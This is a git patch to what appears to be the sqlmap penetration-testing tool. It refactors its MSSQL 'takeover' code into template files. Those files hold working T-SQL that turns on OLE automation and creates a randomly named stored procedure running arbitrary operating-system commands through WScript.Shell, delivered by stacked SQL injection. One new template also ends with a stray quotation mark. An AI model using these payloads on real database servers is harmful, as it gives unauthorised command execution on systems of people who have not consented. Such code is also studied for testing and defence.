From fd4cfb0cc09967a19ab7ecdd2bb0bb35da67199b Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Mon, 2 Jul 2012 15:28:19 +0100
Subject: [PATCH] working on #51

---
 lib/takeover/xp_cmdshell.py                  | 17 ++++-------------
 procs/mssqlserver/activate_sp_oacreate.txt   |  4 ++++
 procs/mssqlserver/create_new_xp_cmdshell.txt |  8 ++++++++
 3 files changed, 16 insertions(+), 13 deletions(-)
 create mode 100644 procs/mssqlserver/activate_sp_oacreate.txt
 create mode 100644 procs/mssqlserver/create_new_xp_cmdshell.txt

diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index b2921bfb4..9c80d7f3d 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -41,23 +41,14 @@ class xp_cmdshell:
         if Backend.isVersionWithin(("2005", "2008")):
             logger.debug("activating sp_OACreate")
 
-            cmd += "EXEC master..sp_configure 'show advanced options',1;"
-            cmd += "RECONFIGURE WITH OVERRIDE;"
-            cmd += "EXEC master..sp_configure 'ole automation procedures',1;"
-            cmd += "RECONFIGURE WITH OVERRIDE"
+            cmd = getSPQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
             inject.goStacked(agent.runAsDBMSUser(cmd))
 
         self.__randStr = randomStr(lowercase=True)
-        self.__xpCmdshellNew = randomStr(lowercase=True)
-        self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew
+        self.__xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
+        self.xpCmdshellStr = "master..%s" % self.__xpCmdshellNew
 
-        cmd = "DECLARE @%s nvarchar(999);" % self.__randStr
-        cmd += "set @%s='" % self.__randStr
-        cmd += "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew
-        cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT "
-        cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 "
-        cmd += "EXEC sp_OADestroy @ID';"
-        cmd += "EXEC master..sp_executesql @%s" % self.__randStr
+        cmd = getSPQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self.__randStr, XP_CMDSHELL_NEW=self.__xpCmdshellNew)
 
         if Backend.isVersionWithin(("2005", "2008")):
             cmd += ";RECONFIGURE WITH OVERRIDE"
diff --git a/procs/mssqlserver/activate_sp_oacreate.txt b/procs/mssqlserver/activate_sp_oacreate.txt
new file mode 100644
index 000000000..543ba6635
--- /dev/null
+++ b/procs/mssqlserver/activate_sp_oacreate.txt
@@ -0,0 +1,4 @@
+EXEC master..sp_configure 'show advanced options',1;
+RECONFIGURE WITH OVERRIDE;
+EXEC master..sp_configure 'ole automation procedures',1;
+RECONFIGURE WITH OVERRIDE"
diff --git a/procs/mssqlserver/create_new_xp_cmdshell.txt b/procs/mssqlserver/create_new_xp_cmdshell.txt
new file mode 100644
index 000000000..684d7eb23
--- /dev/null
+++ b/procs/mssqlserver/create_new_xp_cmdshell.txt
@@ -0,0 +1,8 @@
+DECLARE @%RANDSTR% nvarchar(999);
+set @%RANDSTR%='
+CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int 
+EXEC sp_OACreate ''WScript.Shell'',@ID OUT 
+EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 
+EXEC sp_OADestroy @ID';
+EXEC master..sp_executesql @%RANDSTR%
+